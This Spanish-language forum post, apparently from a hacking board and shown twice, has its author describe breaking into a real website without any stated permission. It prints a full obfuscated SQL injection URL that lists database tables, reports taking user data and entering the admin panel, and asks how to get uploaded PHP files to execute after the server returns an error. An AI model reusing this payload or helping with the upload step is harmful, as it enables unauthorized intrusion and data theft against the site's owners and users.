Buenos días.
Hace unos días que vengo intentando romper con la seguridad de un sitio.
Mi primer pared fue la explotación de una SQLi bastante complicada:
Después de mucho trabajo pude acceder a los datos, entre ellos los usuarios. Accedí al panel de administración y me encontre con un input file que me permite subir cualquier tipo de archivo a una carpeta del servidor.
El problema aquí es que no puedo ejecutar archivos .php ya que me devuelve un:
Probé llamar al archivo .php desde un html con un iframe pero el problema persiste.
Consulto a ustedes que tienen mucho más experiencia:
¿Hay alguna otra posibildad?
Gracias
Hace unos días que vengo intentando romper con la seguridad de un sitio.
Mi primer pared fue la explotación de una SQLi bastante complicada:
Citarhttp://web.com.ar/archivo.php?param1=1&id=%281%29and%280%29union+%23xDxD%0A%23as%0A%23xDxD%0A%23asd%0Aselect+0x53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f53514c695f,2,3,group_concat%28table_name,0x3c48523e%29,5,6+from+%23asd%0A+information_schema%23asd%0A.%23asd%0Atables--
Después de mucho trabajo pude acceder a los datos, entre ellos los usuarios. Accedí al panel de administración y me encontre con un input file que me permite subir cualquier tipo de archivo a una carpeta del servidor.
El problema aquí es que no puedo ejecutar archivos .php ya que me devuelve un:
CitarInternal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@***** and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Probé llamar al archivo .php desde un html con un iframe pero el problema persiste.
Consulto a ustedes que tienen mucho más experiencia:
¿Hay alguna otra posibildad?
Gracias